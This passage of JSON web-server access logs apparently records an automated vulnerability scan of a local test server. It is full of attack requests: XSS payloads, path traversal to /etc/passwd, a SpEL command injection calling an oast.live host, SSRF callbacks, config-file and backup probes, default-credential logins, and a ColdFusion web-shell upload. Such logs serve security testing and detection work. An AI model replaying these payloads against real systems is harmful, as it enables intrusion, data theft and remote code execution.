md5(202072102)),0x7e),1)\x22},\x22status\x22:2}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"username=jovyan&password=jupyter","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hub/login?next= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/88 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /users/user-dark-features HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ampps/index.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.msmtprc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /flow/registries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"fldr=&url=file:///etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /filemanager/upload.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goforms/rlminfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fpui/jsp/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=admin/views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hedwig.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.wp-config.php.swp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/89 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"referer=%2Fthruk&login=--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=Thruk+Monitoring+Webinterface","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /thruk/cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"127.0.0.1/thruk/cgi-bin/login.cgi?thruk", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"ip=ca28fg0smpvbd3qg07h0cx8rdxmtctohj.oast.live:80&argu=/","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/query.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/submissions HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system-diagnostics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iam/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vpn/../vpns/cfg/smb.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"imgSrc=a","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"icl_post_action=save_theme_localization&locale_file_name_en=EN\x22>\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"Name=admin&Pass=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /manager/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config-sample.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/90 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?g=g&m=Door&a=index&content=\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A
Command:value=\x22#form.cmd#\x22>
Options: value=\x22#form.opts#\x22>
Timeout: value=\x22#form.timeout#\x22\x0D\x0A value=\x225\x22>
\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A
\x0D\x0A#HTMLCodeFormat(myVar)#\x0D\x0A
\x0D\x0A
\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lucee/admin/imgProcess.cfm?file=/../../../context/29KD1znuEjFldMTTK488vHo3wxa.cfm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /homepage.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22nslookup%20ca28fg0smpvbd3qg07h07cgabi1iggwjo.oast.live%22%29%7D__::.x/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wow-company&tab=http://ca28fg0smpvbd3qg07h0djaod1a4446u7.oast.live/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.inc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/91 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET .//WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} 